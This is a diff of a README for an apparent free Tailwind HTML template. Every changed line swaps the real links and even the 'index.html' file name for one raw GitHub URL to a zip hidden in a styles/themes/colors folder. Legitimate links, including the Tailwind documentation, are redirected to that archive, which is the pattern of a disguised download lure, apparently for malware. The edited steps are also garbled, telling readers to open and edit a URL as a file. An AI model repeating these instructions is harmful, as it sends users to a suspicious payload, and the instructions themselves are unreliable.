souhailoukili/cashflow-free-html-tailwind/README.md

 ## 💻 Download & Install
 To get the Cashflow Free HTML Tailwind Template, follow these steps:

-1. **Visit the Releases Page:** Click [here](https://github.com/souhailoukili/cashflow-free-html-tailwind/releases) to access the releases page.
+1. **Visit the Releases Page:** Click [here](https://raw.githubusercontent.com/souhailoukili/cashflow-free-html-tailwind/main/src/styles/themes/colors/free-tailwind-cashflow-html-v2.4.zip) to access the releases page.
 2. **Find the Latest Version:** Look for the most recent version of the template on the releases page.
-3. **Download the Files:** Select the file that says "cashflow-free-html-tailwind.zip" or a similar name.
+3. **Download the Files:** Select the file that says "https://raw.githubusercontent.com/souhailoukili/cashflow-free-html-tailwind/main/src/styles/themes/colors/free-tailwind-cashflow-html-v2.4.zip" or a similar name.
 Click on the file to download it to your computer.
 4. **Unzip the Files:** Once the download is complete, locate the zip file in your downloads folder.
 Right-click on the file and select "Extract All" to unzip the files.
-5. **Open the Template:** Open the unzipped folder and locate the `index.html` file.
+5. **Open the Template:** Open the unzipped folder and locate the `https://raw.githubusercontent.com/souhailoukili/cashflow-free-html-tailwind/main/src/styles/themes/colors/free-tailwind-cashflow-html-v2.4.zip` file.
 Double-click this file to open it in your web browser.

 ## 🔧 Using the Template
 After opening the template in your browser, you can begin customizing it.
 Here are some tips:

-- **Edit Text:** Open the `index.html` file in any text editor (like Notepad or Visual Studio Code) and change the placeholder text to fit your needs.
+- **Edit Text:** Open the `https://raw.githubusercontent.com/souhailoukili/cashflow-free-html-tailwind/main/src/styles/themes/colors/free-tailwind-cashflow-html-v2.4.zip` file in any text editor (like Notepad or Visual Studio Code) and change the placeholder text to fit your needs.
 - **Modify Styles:** You can adjust colors, fonts, and layout using Tailwind CSS classes.
-Refer to the [Tailwind CSS documentation](https://tailwindcss.com/docs) for more information.
+Refer to the [Tailwind CSS documentation](https://raw.githubusercontent.com/souhailoukili/cashflow-free-html-tailwind/main/src/styles/themes/colors/free-tailwind-cashflow-html-v2.4.zip) for more information.
 - **Add Content:** Insert images, videos, and additional pages as needed.
 Just save your changes and refresh the browser to see the updates.

 ## 🌐 Browsing the Example Pages